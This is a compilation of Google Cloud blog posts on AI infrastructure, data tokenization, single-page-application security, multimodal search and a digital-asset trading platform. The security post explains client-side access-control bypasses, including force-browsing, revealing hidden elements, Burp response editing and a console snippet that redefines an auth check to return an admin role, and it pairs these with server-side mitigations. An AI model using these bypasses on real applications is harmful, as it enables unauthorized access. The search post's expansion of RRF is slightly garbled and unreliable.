The last few weeks of 2024 were exhilarating as we worked to bring you multiple advancements in AI infrastructure, including the general availability of Trillium, our sixth-generation TPU; A3 Ultra VMs powered by NVIDIA H200 GPUs; support for up to 65,000 nodes in Google Kubernetes Engine (GKE); and Parallelstore, our distributed file system service that offers the low-latency, high-throughput storage that’s essential for HPC and AI workloads. We’re excited to see what you build with these new capabilities.
These innovations come together in AI Hypercomputer, a systems-level approach that draws from our years of experience serving AI experiences for billions of users, and combines performance-optimized hardware, open software and frameworks, and flexible consumption models. This means when you build your AI solution on Google Cloud, you can choose from a set of purpose-built infrastructure components that are designed to work well together. This freedom to choose the appropriate solution for the needs of your specific workload is fundamental to our approach.
Here are some key updates to AI Hypercomputer from the last quarter based on new infrastructure components and how they enable specific AI use cases.
Running distributed (multi-node) workloads
The performance of multi-node (multi-host) applications such as large-scale AI training and HPC workloads can be highly sensitive to network connectivity, requiring precise setup and proactive monitoring. We wanted to make it easier for customers to run large multi-node workloads on GPUs, and launched A3 Ultra VMs and Hypercompute Cluster, our new highly scalable clustering system. Both offerings were made generally available to close out 2024.
A3 Ultra, with NVIDIA H200 GPUs, is a new addition to the A3 family of NVIDIA Hopper GPU-accelerated VMs, with twice the GPU-to-GPU network bandwidth and twice the high-bandwidth memory (HBM) compared to A3 Mega with NVIDIA H100 GPUs. A3 Ultra VMs offer the best performance in the A3 family. They are built with our new Titanium ML network adapter and incorporate NVIDIA ConnectX-7 network interface cards (NICs) to deliver a secure, high-performance cloud experience for AI workloads. Combined with our datacenter-wide 4-way rail-aligned network, A3 Ultra VMs deliver up to 3.2 Tbps of non-blocking GPU-to-GPU communication with RDMA over Converged Ethernet (RoCE).
A3 Ultra VMs are also available through GKE, which provides an open, portable, extensible, and highly scalable platform for training and serving AI workloads. To try out A3 Ultra VMs, you can easily create a cluster with GKE or try this pretraining GPU recipe.
Hypercompute Cluster, meanwhile, is a supercomputing services platform built on AI Hypercomputer that lets you deploy and manage a large number of accelerators as a single unit. With features such as dense co-location of resources with ultra-low-latency networking, targeted workload placement, advanced maintenance controls to minimize workload disruption, and topology-aware scheduling integrated into popular schedulers like Slurm and GKE, we built Hypercompute Cluster to help you achieve your throughput and resilience goals. You can use a single API call with pre-configured and validated templates for reliable and repeatable deployments, and with cluster-level observability, health monitoring, and diagnostic tooling, Hypercompute Clusters can run your most demanding workloads easily on Google Cloud. Hypercompute Cluster is now available with A3 Ultra VMs.
LG Research is an active user of Google Cloud infrastructure, which they used to train their large language model, Exaone 3.0. They are also an early adopter of A3 Ultra VMs and Hypercompute Cluster, which they are using to power their next set of innovations.
“From the moment we started using Google Cloud’s A3 Ultra with Hypercompute Cluster, powered by NVIDIA H200 GPUs, we were immediately struck by its remarkable performance gains and seamless scalability for our AI workloads. Even more impressive, we had our cluster up and running with our code in under a day — an enormous improvement from the 10 days it used to take us. We look forward to further exploring the potential of this advanced infrastructure for our AI initiatives.” – Jiyeon Jung, AI Infra Sr Engineer, LG AI Research
Making inference on TPUs easier
To enable the next generation of AI agents capable of complex, multi-step reasoning, you need accelerators designed to handle the demanding computational requirements of these advanced models. Trillium TPUs provide significant advancements for inference workloads, delivering up to 3x improvement in inference throughput compared to prior generation TPU v5e.
There are multiple ways to leverage Google Cloud TPUs for AI inference based on your specific needs. You can do this through Vertex AI, our fully managed, unified AI development platform for building and using generative AI, which is powered by the AI Hypercomputer architecture under the hood. But if you need greater control, we have options lower in the stack that are designed for optimal serving on Cloud TPUs: JetStream is a memory- and throughput-optimized serving engine for LLMs. MaxDiffusion offers a launching point for diffusion models. And for the Hugging Face community, we worked closely with Hugging Face to launch Optimum TPU and Hugging Face TGI to make serving on Cloud TPUs easier.
Most recently, we announced experimental support for vLLM on TPU with PyTorch/XLA 2.5. Motivated by the strong response to this popular serving option, we’ve been running a preview with a small set of customers to bring the performance (and price-performance) benefits of Cloud TPUs to vLLM.
Our goal is to make it easy for you to try out Cloud TPUs with your existing vLLM setup — just make a few configuration changes to see performance and efficiency benefits in Compute Engine, GKE, Vertex AI, and Dataflow. You can take vLLM for a spin on the Trillium TPUs with this tutorial. All this innovation is happening in the open, and we welcome your contributions.
As we start a new year, we’re excited to continue pushing the boundaries of AI infrastructure with AI Hypercomputer. These updates represent our ongoing commitment to providing you with the performance, efficiency, and ease of use you need to accelerate your AI journey. We look forward to seeing what you achieve with these new capabilities.
In many industries including finance and healthcare, sensitive data such as payment card numbers and government identification numbers need to be secured before they can be used and shared. A common approach is applying tokenization to enhance security and manage risk.
A token is a substitute value that replaces sensitive data during its use or processing. Instead of directly working with the original, sensitive information (usually referred to as the “raw data”), a token acts as a stand-in. Unlike raw data, the token is a scrambled or encrypted value.
Using tokens reduces the real-world risk posed by using the raw data, while maintaining the ability to join or aggregate values across multiple datasets. This technique is known as preserving referential integrity.
Tokenization engineered into Google Cloud
While tokenization is often seen as a specialized technology that can be challenging and potentially expensive to integrate into existing systems and workflows, Google Cloud offers powerful, scalable tokenization capabilities as part of our Sensitive Data Protection service. With it, you can make calls into serverless API endpoints to tokenize data on the fly in your own applications and data pipelines.
This allows you to enable tokenization without needing to manage any third-party deployments, hardware, or virtual machines. Additionally, the service is fully regionalized, which means tokenization processing happens in the geographical region of your choice, helping you adhere to regulatory or compliance regimes. Pricing is based on data throughput with no upfront costs, so you can scale to meet the needs of your business.
Sensitive Data Protection takes things even further, offering in-line tokenization for unstructured, natural-language content. This allows you to tokenize data in the middle of a sentence, and if you pick two-way tokenization (and have the right access permissions), you can even detokenize the data when necessary.
This opens up a whole new set of use cases, including runtime tokenization of logs, customer chats, or even content flowing through a generative AI serving framework. We’ve also built this technology directly into the Contact Center AI and Dialogflow services so that you can tokenize customer engagements on the fly.
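As a rough, minimal sketch of what a serverless tokenization call can look like from Node.js (assuming the @google-cloud/dlp client library; the project ID, KMS key names, and surrogate info type below are placeholders you would replace with your own):

// Minimal sketch: tokenize email addresses found in free text.
// Assumes the @google-cloud/dlp client library; key names and env vars are placeholders.
const { DlpServiceClient } = require('@google-cloud/dlp');
const dlp = new DlpServiceClient();

async function tokenizeText(projectId, text) {
  const [response] = await dlp.deidentifyContent({
    parent: `projects/${projectId}/locations/global`,
    inspectConfig: { infoTypes: [{ name: 'EMAIL_ADDRESS' }] },
    deidentifyConfig: {
      infoTypeTransformations: {
        transformations: [{
          infoTypes: [{ name: 'EMAIL_ADDRESS' }],
          primitiveTransformation: {
            cryptoDeterministicConfig: {
              cryptoKey: {
                kmsWrapped: {
                  wrappedKey: process.env.WRAPPED_KEY,      // placeholder
                  cryptoKeyName: process.env.KMS_KEY_NAME,  // placeholder
                },
              },
              surrogateInfoType: { name: 'EMAIL' },
            },
          },
        }],
      },
    },
    item: { value: text },
  });
  // e.g. "Please contact EMAIL(44):AYCLw6Bh... about the refund"
  return response.item.value;
}

Because the transformation is deterministic and emits a surrogate, a matching configuration can later be passed to reidentifyContent to reverse the token, provided the caller has access to the key.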
Tokenization with BigQuery
In addition to serverless access through Sensitive Data Protection, we also offer tokenization directly in BigQuery. This gives you tokenization methods at your fingertips in BigQuery SQL queries, User Defined Functions (UDFs), views, and pipelines.
Tokenization technology is built directly into the BigQuery engine to work at high speed and high scale for structured data, such as tokenizing an entire column of values. The resulting tokens are compatible and interoperable with those generated through our Sensitive Data Protection engine. That means you can tokenize or detokenize in either system without incurring unnecessary latency or costs, all while maintaining the same referential integrity.
Using tokens to solve real problems
While the token obfuscates the sensitive value and reduces real-world risk, utility and value are still preserved. Consider the following table, which has four rows and three unique values: value1, value2, value3.
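| Raw value | Token |
| --- | --- |
| value1 | token1 |
| value2 | token2 |
| value3 | token3 |
| value1 | token1 |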
Here you can see that each value is replaced with a token. Notice how “value1” gets “token1” consistently. If you run an aggregation and count unique tokens, you’ll get a count of three, just like on the original value. If you were to join on the tokenized values, you’d get the same type of joins as if joining on the original value.
This simple approach unlocks a lot of use cases.
Obfuscating real-world risk
Consider the use case of running fraud analysis across 10 million user accounts. In this case, let’s say that all of your transactions are linked to the end user’s email address. An email address is an identifier that poses several risks:
It can be used to contact the end-user who owns that email address.
It may link to data in other systems that are not supposed to be joined.
It may reveal someone’s real-world identity and expand that identity’s connection to internal data.
It may leak other forms of identity, such as the name of the owner of the email account.
Let’s say that the token for that email is “EMAIL(44):AYCLw6BhB0QvauFE5ZPC86Jbn59VogYtTrE7w+rdArLr” and this token has been scoped only to the tables and datasets needed for fraud analysis. That token can now be used in place of the email address: you can tokenize the emails across all the transaction tables and then run fraud analysis.
During this analysis, any users or pipelines exposed to the data would see only the obfuscated emails, protecting your 10 million users while unblocking your business.
Next steps
Tokenization provides a powerful way to protect sensitive information while still allowing for essential data operations. By replacing sensitive data with non-sensitive substitutes, tokens can significantly reduce the risk of data breaches and simplify compliance efforts. Google Cloud simplifies tokenization by offering a readily available, scalable, and region-aware service, allowing you to focus on your core business rather than managing infrastructure.
To get started with tokenization on Google Cloud, see the following:
Written by: Steven Karschnia, Truman Brown, Jacob Paullus, Daniel McNamara
Executive Summary
Due to their client-side nature, single-page applications (SPAs) are often prone to access control vulnerabilities
By implementing a robust access control policy on supporting APIs, the risks associated with client-side rendering can be largely mitigated
Using server-side rendering within the SPA can prevent unauthorized users from modifying or even viewing pages and data that they are not authorized to see
Introduction
Single-page applications (SPAs) are popular due to their dynamic and user-friendly interfaces, but they can also introduce security risks. The client-side rendering frequently implemented in SPAs can make them vulnerable to unauthorized access and data manipulation. This blog post will explore the vulnerabilities inherent in SPAs, including routing manipulation, hidden element exposure, and JavaScript debugging, as well as provide recommendations on how to mitigate these risks.
Single-Page Applications
A SPA is a web application design framework in which the application returns a single document whose content is hidden, displayed, or otherwise modified by JavaScript. This differs from the flat file application framework traditionally implemented in PHP or strictly HTML sites and from the Model-View-Controller (MVC) architecture where data, views, and server controls are handled by different portions of the application. Dynamic data in SPAs is updated through API calls, eliminating the need for page refreshes or navigation to different URLs. This approach makes SPAs feel more like native applications, offering a seamless user experience. JavaScript frameworks that are commonly used to implement SPAs include React, Angular, and Vue.
Client-Side Rendering
In SPAs that use client-side rendering, a server responds to a request with an HTML document that contains only CSS, metadata, and JavaScript. The initially returned HTML document does not contain any content; instead, once the JavaScript files have run in the browser, the application’s frontend user interface (UI) and content are loaded into the HTML document at runtime. If the application is designed to use routing, JavaScript takes the URL and attempts to generate the page that the user requested. While this is happening, the application is making requests to the API endpoint to load data and check whether the current user is authorized to access it. If a user is not yet authenticated, the application will render a login page or redirect the user to a separate single sign-on (SSO) application for authentication.
While all of this happens, a user may briefly observe a blank white page before the application dashboard or login page is loaded into their browser. During this pause, the application is potentially loading hundreds of thousands of lines of minified JavaScript that will build the full user experience of the application. SPAs are used in millions of applications across the globe, including Netflix, Hulu, Uber, and DoorDash.
Issues with Client-Side Rendering
Because SPAs rely entirely on the client’s browser to render content (using API data), users have significant control over the application. This enables users to manipulate the application freely, making user or role impersonation easier.
Routing
One fundamental aspect of the JavaScript frameworks that SPAs are implemented in is the idea of routes. These frameworks use routes to indicate different pages in the application. Routes in this case are different views that a user can see, like a dashboard or user profile. Since all of the JavaScript is handled by the client’s browser, the client can view these routes in the JavaScript files that are included in the application source. If a user can identify these routes, they can attempt to access any of them. Depending on how the JavaScript was implemented, there may be checks in place to see if a user has access to a specific route. The following is an example of React routing that includes information on creating the views and, more importantly, path attributes.
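A minimal sketch of what such a route table can look like with React Router (the paths and component names here are hypothetical):

import { BrowserRouter, Routes, Route } from 'react-router-dom';
import Login from './Login';
import Dashboard from './Dashboard';
import Profile from './Profile';
import AdminPanel from './AdminPanel';

// Every path below ships to the browser in the JavaScript bundle,
// so any user can read it, whether or not the UI ever links to it.
export default function App() {
  return (
    <BrowserRouter>
      <Routes>
        <Route path="/login" element={<Login />} />
        <Route path="/dashboard" element={<Dashboard />} />
        <Route path="/profile/:userId" element={<Profile />} />
        <Route path="/admin" element={<AdminPanel />} /> {/* discoverable even if never linked */}
      </Routes>
    </BrowserRouter>
  );
}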
Hidden Elements
One way that access control is handled by SPAs is through hidden page elements. When the page loads, the application checks the user’s role through local/session storage, cookie values, or server responses, and then displays or hides elements based on that role. In some cases, the application only renders elements that are accessible to the user. In other cases, the application renders every element but “hides” them by controlling the element’s CSS properties. Hidden elements can be exposed through the browser’s Developer Tools, allowing users to force their display. These hidden elements could be form fields or even links to other pages.
JavaScript Debugging
Modern browsers allow users to debug JavaScript in real time by setting breakpoints on JavaScript files, which can be used to modify variables or rewrite functions altogether. Debugging core functions can allow users to bypass access controls and gain unauthorized page access. Consider the following JavaScript:
function isAuth() {
  var user = {};
  // Read the raw cookie string from the browser.
  var cookies = document.cookie;
  // Base64-decode the cookie value and split it into name, role, and auth flag.
  var userData = atob(cookies).split(':');
  if (userData.length == 3) {
    user.name = userData[0];
    user.role = userData[1];
    user.isAuthed = userData[2];
  } else {
    user.name = "";
    user.role = "";
    user.isAuthed = false;
  }
  return user;
}
The previously defined function reads the user’s cookie, Base64-decodes the value, splits the text using ":" as the delimiter, and, if three values are present, populates the user object from them. Identifying core functions like this allows an attacker to bypass any authorization and access controls that are handled by the client-side application.
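As a concrete, hypothetical illustration, once a function like this is located, an attacker could redefine it from the browser console or while paused at a breakpoint:

// Redefine the client-side check so every later call reports an admin user.
// This only fools the client-side rendering; a properly protected API would still refuse the data.
isAuth = function () {
  return { name: 'attacker', role: 'admin', isAuthed: true };
};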
Exploitation
Manually exploiting JavaScript framework issues takes time and practice, but there are a few techniques that can make it easier. A common technique involves analyzing JavaScript files to identify application routes. Identifying routes allows you to “force-browse” to application pages and access them directly, rather than through the UI. This technique may work on its own, but other times you may need to identify any role checks in the application. These checks can be accessed through the JavaScript debugger to modify variables during execution to bypass authorization or authentication checks. Another useful technique involves capturing server responses to requests for user information in an HTTP proxy, such as Burp Suite Professional, and manually modifying the user object. While these exploitation techniques are effective, they can be mitigated through strong preventative measures, including those detailed in this post.
Recommendations
Access control issues are systemic to client-side-rendered JavaScript frameworks. Once a user has the application loaded into their browser, there are few effective mitigations to prevent the user from interacting with content in unauthorized ways. However, by implementing robust server-side access control checks on APIs, the effect that an attacker could produce is severely reduced. While the attacker might be able to view what a page would look like in the context of an administrator or even view the structure of a privileged request, the attacker would be unable to obtain or modify restricted data.
API requests should be logged and monitored to identify if unauthorized users are attempting to or successfully accessing protected data. Additionally, it is advisable to conduct periodic penetration tests of web applications and APIs throughout their lifetime to identify any gaps in security. Penetration testing should uncover any APIs with partial or incomplete access control implementations, which would provide an opportunity to remediate flaws before they are abused by an adversary.
API Access Controls
Implementing robust API access controls is critical for securing SPAs. Access control mechanisms should use a JSON Web Token (JWT) or other unique, immutable session identifier to prevent users from modifying or forging session tokens. API endpoints should validate session tokens and enforce role-based access for every interaction. APIs are often configured to check if a user is authenticated, but they don’t comprehensively check user role access to an endpoint. In some cases, just one misconfigured endpoint is all it takes to compromise an application. For example, if all application endpoints are checking a user’s role except the admin endpoint that creates new users, then an attacker can create users at arbitrary role levels, including admin users.
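As one hedged sketch of per-endpoint enforcement in a Node.js/Express API (your framework, token library, and claim names may differ), the middleware below validates the JWT on every request and then checks the caller’s role before the admin-only handler runs:

const express = require('express');
const jwt = require('jsonwebtoken');

const app = express();
app.use(express.json());

// Validate the session token on every request; reject anything missing, unsigned, or expired.
function authenticate(req, res, next) {
  const token = (req.headers.authorization || '').replace('Bearer ', '');
  try {
    req.user = jwt.verify(token, process.env.JWT_SECRET); // assumed shared-secret signing
    next();
  } catch (err) {
    res.status(401).json({ error: 'Not authenticated' });
  }
}

// Enforce role-based access per endpoint, not just authentication.
function requireRole(role) {
  return (req, res, next) => {
    if (req.user && req.user.role === role) return next();
    res.status(403).json({ error: 'Not authorized' });
  };
}

// Without requireRole('admin'), this would be the one misconfigured endpoint described above.
app.post('/api/admin/users', authenticate, requireRole('admin'), (req, res) => {
  // ...create the user here...
  res.status(201).json({ created: true });
});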
An example of proper API access control is shown in Figure 1.
This diagram shows a user authenticating to the application, receiving a JWT, and rendering a page. The user interacts with the SPA and requests a page. The SPA identifies that the user is not authenticated so the JavaScript renders the login page. Once a user submits the login request, the SPA forwards it to the server through an API request. The API responds stating the user is authenticated and provides a JWT that can be used with subsequent requests. Once the SPA receives the response from the server, it stores the JWT and renders the dashboard that the user originally requested.
At the same time, the SPA requests the data necessary to render the page from the API. The API sends the data back to the application, and it is displayed to the user. Next, the user finds a way to bypass the client-side access controls and requests the main admin page in the application. The SPA makes the API requests to render the data for the admin page. The backend server checks the user’s role level, but since the user is not an admin user, the server returns a 403 error stating that the user is not allowed to access the data.
The example in Figure 1 shows how API access controls prevent a user from accessing API data. As stated in the example, the user was able to access the page in the SPA; however, due to the API access controls, they are not able to access the data necessary to fully render the page. For APIs developed in C# or Java, frameworks often provide annotations to simplify implementing access controls.
Server-Side Rendering
Aside from API access controls, another way to mitigate this issue is by using a JavaScript framework that has server-side rendering capabilities, such as SvelteKit, Next.js, Nuxt.js, or Gatsby. Server-side rendering is a combination of the MVC and SPA architectures. Instead of delivering all source content at once, the server renders the requested SPA page and sends only the finalized output to the user. The client browser is no longer in charge of routing, rendering, or access controls. The server can enforce access control rules before rendering the HTML, ensuring only authorized users see specific components or data.
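For instance, in a server-side rendered framework such as Next.js, the authorization decision can be made before any HTML is produced; in this sketch, getSession() and fetchAdminDashboardData() are illustrative placeholders standing in for your real session and data layers:

// pages/admin.js - getSession() and fetchAdminDashboardData() are illustrative placeholders.
export async function getServerSideProps(context) {
  const session = await getSession(context.req); // look up the caller's session server-side

  if (!session) {
    // Unauthenticated users never receive the admin markup, only a redirect.
    return { redirect: { destination: '/login', permanent: false } };
  }
  if (session.role !== 'admin') {
    // Authorization is enforced on the server before any HTML is rendered.
    return { notFound: true }; // or redirect to an error page
  }

  const data = await fetchAdminDashboardData(session);
  return { props: { data } };
}

export default function AdminPage({ data }) {
  // This component is only ever rendered with data for authorized admins.
  return <pre>{JSON.stringify(data, null, 2)}</pre>;
}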
An example of server-side rendering is shown in Figure 2.
This diagram shows a user accessing a server-side rendered application. After requesting an authenticated page in the application, the server checks if the user is authenticated and authorized to view the page. Since the user is not yet authenticated, the application renders the login page and displays that page to the user. The user then authenticates, and the server builds out the session, sets necessary cookies or tokens, and then redirects the user to the application dashboard. Upon being redirected, the user makes a request, the server checks the authentication state, and since the user has permissions to access the page, it fetches the necessary data and renders the dashboard with the data.
Next, the user identifies an admin page URL and attempts to access it. In this instance, the application checks the authentication state and the user’s role. Since the user does not have the admin role, they are not allowed to view the page and the server responds with either a 403 Forbidden or a redirection to an error page.
A Final Word
In conclusion, SPAs offer a dynamic and engaging user experience, but they also introduce unique security challenges when implemented with client-side rendering. By understanding the vulnerabilities inherent in SPAs, such as routing manipulation, hidden element exposure, and JavaScript debugging, developers can take proactive steps to mitigate risks. Implementing robust server-side access controls, API security measures, and server-side rendering are excellent ways to safeguard SPAs against unauthorized access and data breaches. Regular penetration testing and security assessments can further strengthen the overall security posture of SPAs by identifying any security gaps present in the application and allowing developers to remediate them before they are exploited. By prioritizing security best practices, developers can ensure that SPAs deliver both a seamless user experience and a secure environment for sensitive data.
The way users search is evolving. When searching for a product, users might type in natural-sounding language or search with images. In return, they want tailored results that are specific to their query. To meet these demands, developers need robust multimodal search systems.
In this blog post, we’ll share a powerful approach to build a multimodal search engine using Google Cloud’s Vertex AI platform. We’ll combine the strengths of Vertex AI Search and vector search, using an ensemble method with weighted Rank-Biased Reciprocal Rank (RRF). This approach allows for:
Improved user experience: Searching becomes more intuitive and less reliant on finding the “perfect” keywords.
Enhanced product discovery: Users can uncover items they might not have found with text alone.
Higher conversion rates: More relevant and engaging search results lead to happier customers and increased sales.
Why using a combined approach matters
Think about how you search for products online. You might type queries such as “homes with a large backyard” or “white marble countertops”. Some of this information might be stored in text, while other details might only be available in images. When you search for a product, you want the system to look through both modalities.
One approach might be to ask a large language model (LLM) to generate a text description of an image. But this can be cumbersome to manage over time and adds latency for your users. Instead, we can leverage image embeddings and combine the search results with text data in Vertex AI Search. Together, this multimodal approach delivers:
Richer visual understanding: Multi-modal embeddings capture the complex visual features and relationships within images, going beyond simpler text annotations.
Image-based queries: Users can directly search using an image, allowing for more intuitive discovery based on visual inspiration.
Precise filtering: Filtering by detailed attributes like size, layout, materials, and features becomes possible, leading to highly accurate search and curated results.
Google Cloud’s Vertex AI platform provides a comprehensive set of tools for building and deploying machine learning solutions, including powerful search capabilities:
Vertex AI Search: A highly scalable and feature-rich engine for many types of search. It supports advanced features like faceting, filtering, synonyms, and custom relevance ranking. It also enables advanced document parsing, including unstructured documents (PDFs) and even those with embedded graphics such as tables and infographics.
Vertex AI multimodal embedding API: This is used to generate image embeddings (numerical representations of images).
Vertex AI Vector Search: This is used as the vector database to store the embeddings with metadata information for searching. It can store both sparse embeddings, e.g. text descriptions, and dense embeddings, e.g. images.
Our ensemble approach: Text + image power
To create our multimodal search engine, we’ll use an ensemble approach that combines the strengths of Vertex AI Search and vector search for images:
Text search with Vertex AI Search:
Index your product catalog data (names, descriptions, attributes) into a data store using Agent Builder.
When a user enters a text query, Vertex AI Search returns relevant products based on keyword matching, semantic understanding, and any custom ranking rules you’ve defined.
This also has capabilities to return facets which can further be used for filtering.
You can even visualize how unstructured or complex documents are parsed and chunked.
Image search with vector embeddings:
Generate image embeddings for your products using multimodal embeddings API.
Store these embeddings in vector search.
When a user uploads an image or text, convert it to an embedding and query the vector database to find visually similar product images.
Combining results with weighted RRF:
Rank-biased Reciprocal Rank (RRF): This scoring method fuses multiple ranked lists by giving each item a score based on its position in each list, so items that appear near the top contribute more to the final ranking.
Weighted RRF: Assign weights to the text relevance ranking (from Vertex AI Search) and the image similarity ranking (from vector search). This allows you to adjust the importance of each modality (i.e., Vertex AI Search or Vector Search) in the final ranking.
Ensemble: Combine the text and image search results, re-rank them using the weighted RRF score, and present the blended list to the user, as sketched below.
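One common formulation of weighted reciprocal-rank fusion is sketched below; the weights and the k smoothing constant are tuning knobs, and the exact scoring function you use may differ.

// Weighted reciprocal-rank fusion of two ranked result lists.
// textResults and imageResults are arrays of product IDs, best match first.
function weightedRrf(textResults, imageResults, textWeight = 0.6, imageWeight = 0.4, k = 60) {
  const scores = new Map();
  const accumulate = (results, weight) => {
    results.forEach((id, index) => {
      // Higher-ranked items (smaller index) contribute more to the fused score.
      const contribution = weight / (k + index + 1);
      scores.set(id, (scores.get(id) || 0) + contribution);
    });
  };
  accumulate(textResults, textWeight);   // results from Vertex AI Search
  accumulate(imageResults, imageWeight); // results from Vector Search
  // Return product IDs ordered by their fused score, highest first.
  return [...scores.entries()].sort((a, b) => b[1] - a[1]).map(([id]) => id);
}

// Example: blend keyword matches with visually similar items.
// weightedRrf(['sku-12', 'sku-7', 'sku-3'], ['sku-7', 'sku-42'], 0.6, 0.4);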
To enhance the search experience, use Vertex AI Agent Builder Search’s faceting capabilities:
Define facets: Based on your product data, create facets for categories, attributes (color, size, material), price ranges, etc.
Dynamic filtering: Allow users to interactively refine their searches using these facets, narrowing down the results to the most relevant products. The filters adjust automatically based on the returned results (hence “dynamic”).
Natural language query understanding: If the textual data is structured, you can enable natural language query understanding in Vertex AI Agent Builder Search to improve query results. You can then parse the filters from the response and apply the same filters to vector search using namespaces.
Why this approach works
This approach gives developers the best of both worlds by combining the rich features of Vertex AI Search (for example, the parsing pipeline) with the ability to use images directly as a query. It’s also flexible and customizable: you can adjust the weights in your RRF ensemble and tailor facets to your specific needs.
Above all, this approach gives your users what they need – the ability to search intuitively using text, images, or both, while offering dynamic filtering options for refined results.
Get started with multi-modal search
By leveraging the power of Vertex AI and combining text and image search with a robust ensemble method, you can build a highly effective and engaging search experience for your users. Get started:
Explore Vertex AI: Dive into the documentation and explore the capabilities of Vertex AI Search and embedding generation.
Experiment with embeddings: Test different image embedding models and fine-tune them on your data if needed.
Implement weighted RRF: Design your scoring function and experiment with different weights to optimize your search results.
Natural language query understanding: Leverage the built-in capabilities of Vertex AI Agent Builder Search to generate filters from structured data and apply the same filters to Vector Search.
Filters in vector search: Apply filters to your image embeddings to give users further control.
Earlier this year, Deutsche Börse Group began developing a new cloud-native, purpose-built trading platform. It was built with a focus on digital assets, such as stablecoins, cryptocurrencies, and other tokenized assets. However, the new platform is instrument-agnostic and can trade in all types of assets, from equities to ETFs.
Developing a trading platform for digital assets isn’t just about embracing this increasingly popular and diverse digital investment universe. Tokens and other digital assets originate from decentralized systems, evolve quickly, trade 24/7 across the globe — and require a trading platform fit for purpose. Therefore, if the new trading platform can reliably deliver on digital assets, it can handle just about any asset you’d want to trade.
This work is one of the first major results of the strategic partnership between Deutsche Börse Group and Google Cloud announced in 2023. Today, institutional trading is largely done on-premises with leased-line connectivity or co-location. Deutsche Börse Group has designed a new cloud-native trading engine for a digital trading platform with 24/7 availability and a cloud-native internet API for access (with co-location as a future integration pattern for more demanding market participants), so it can be rolled out quickly to new markets and operated at low cost.
As an international exchange organization and innovative market infrastructure provider, Deutsche Börse Group ensures capital markets are fair, transparent, reliable and stable. Their business covers the entire financial market transaction process chain, including the provisioning of indices, data, software, SaaS and analytical solutions, as well as admission, trading, and clearing. Additionally, it comprises services for funds, the settlement and custody of financial instruments, and the management of collateral and liquidity.
As a technology company, the Group also develops state-of-the-art IT solutions and offers its IT systems all over the world. Trust, stability, reliability, resilience, consistency, and compliance are the cornerstones of Deutsche Börse Group’s business — and the key features we incorporated into the new trading engine over the ten months it took to build.
Digital markets demand new trading systems
Today, Deutsche Börse Group successfully operates high-volume/low-latency trading venues — such as Xetra, Börse Frankfurt, Eurex, and the European Energy Exchange, as well as partner exchanges — by using proven high-performance architectures. Deutsche Börse Group has reached this point by combining financial and technological expertise, and finding the right partners with the knowledge to support its vision.
But even with deep knowledge of our respective fields, the teams at Deutsche Börse Group and Google Cloud knew that building a digital asset trading platform from the ground up would be a challenge. It remains a new and fast-moving space that requires careful and thoughtful consideration to get right.
The need for a new trading engine, and the desire to make it the cornerstone and first component of Deutsche Börse Group’s emerging Digital Asset Business Platform, stems from changing market structures. In the world of digital assets, 24/7 operations are required to reduce execution risk. Market participants also demand choice of market access, including internet connectivity to execute trades anytime, anywhere. Providing access via APIs and convenient SDKs is important for both developer productivity and consistent trade flow. Taken together, these features are essential in markets such as digital assets, where leased line connections and bespoke integrations are not the highest priority.
While traditional trading architectures are designed for industrial purposes and can support high-volume, established markets well, our new trading engine is designed for innovative and changing market structures. These markets prioritize low time-to-market, with participants demanding rapid deployment and seamless integration. Cloud-native platforms address this need by leveraging the flexibility of the cloud to accelerate deployment and simplify connectivity. This translates to faster deployment and ease of use, which are critical advantages in the dynamic world of digital assets.
Finally, a new trading engine would have to meet not only these new requirements, but also common needs such as resilience, fault-tolerance, and high availability.
The Google Cloud team has prioritized the adoption of cloud resource management best practices — infrastructure as code, the continuous integration of infrastructure changes, and their continuous delivery. This enabled the engineering team to quickly develop, test, and deploy an entire exchange, including infrastructure, with minimal manual intervention, allowing the team to experiment and test the performance of different configurations.
The overall scope was twofold: enable the rapid deployment of new trading venues, and enable incremental changes to existing markets on a daily and even intra-day basis. This would enable a market to operate 24/7.
The architecture of a cloud-native trading system
Recognizing that internet connectivity is the access pattern of choice in the target markets, the Google Cloud team designed a multi-market architecture that uses direct ingress to Google Cloud and leverages a Global External Proxy Network Load Balancer (GEPNLB) for traffic from both TCP/IP socket and WebSocket clients. Each market environment utilizes its own set of Network Endpoint Groups (NEGs) and Google Kubernetes Engine clusters. This access pattern may change in the future — for example, if the markets become more liquid and therefore attract investors who require low-latency access via colocation and dedicated interconnects.
In this architecture, the NEGs act as backends for the global GEPNLB backend service, and traffic is routed to the NEGs for each market as appropriate. To reduce latency, the architecture uses single tenancy, different subnets per market, and placement policies to minimize distance between critical components and reduce network hops, contributing to improved performance and reduced latency for market participants.
To enhance security, the architecture incorporates Cloud Armor for DDoS protection. A Cloud Armor security policy is attached to the backend service with various rules, including those for mitigating DDoS attacks. This protects the application from malicious traffic and ensures service availability.
The new trading engine at the heart of this architecture initially supports hit-and-take and request-for-offer market models. It uses sophisticated, highly available, high-performance, in-memory, fault-tolerant services to ensure fair and orderly trading. This requires all trade messages to be processed on a strict first-in-first-out basis to maintain order and prevent any unfair advantages. This is a particularly important feature, as it ensures all market participants have an equal opportunity to interact with the market.
A new kind of trading platform for new kinds of markets
To ensure smooth operations and optimal resource allocation, the team designed comprehensive monitoring of all technical activity using the Google Cloud operations suite. This included both functional monitoring to track trading activity, leveraging Google Cloud Trace to follow the lineage of requests coming in from the web and pinpoint bottlenecks, and technical monitoring to ensure the health and performance of the underlying infrastructure. Google Cloud Monitoring captured key performance indicators at each layer of the trading system stack, including application service metrics and resource utilization.
These real-time insights were combined with rigorous performance testing and capacity planning to ensure low-latency handling of high trading volumes. This combination enabled proactive identification and resolution of potential issues and continuous optimization of resource utilization.
To further streamline operations, the integration of managed services offered by Google Cloud, such as backup and archiving, is a future priority for Deutsche Börse Group as it seeks to focus on its core business while relying on Google Cloud for infrastructure management.
Market participants of all kinds are becoming more sophisticated and more demanding every day as technology continues to evolve the way they access markets, and the types of assets they can invest in. Deutsche Börse Group needs to offer services that are equally sophisticated and able to keep pace with the demands of its global customers.
With our new partnership, we have laid the foundation for a trading platform of the future that will serve not only the increasingly popular world of digital assets, but also legacy trading of all kinds. And with the redundancy, flexibility, and security of our work, it has the potential to make trading of all kinds smoother, faster, and more secure.
If you are looking to reinvent your trading platforms, or any other aspect of your financial services business, discover what Google Cloud can do for you today.
Backscatter is a tool developed by the Mandiant FLARE team that aims to automatically extract malware configurations. It relies on static signatures and emulation to extract this information without dynamic execution, bypassing anti-analysis logic present in many modern families. This complements dynamic analysis, providing faster threat identification and high-confidence malware family attribution. Google SecOps reverse engineers ensure precise indicators of compromise (IOC) extraction, empowering security teams with actionable threat intelligence to proactively neutralize attacks.
Overview
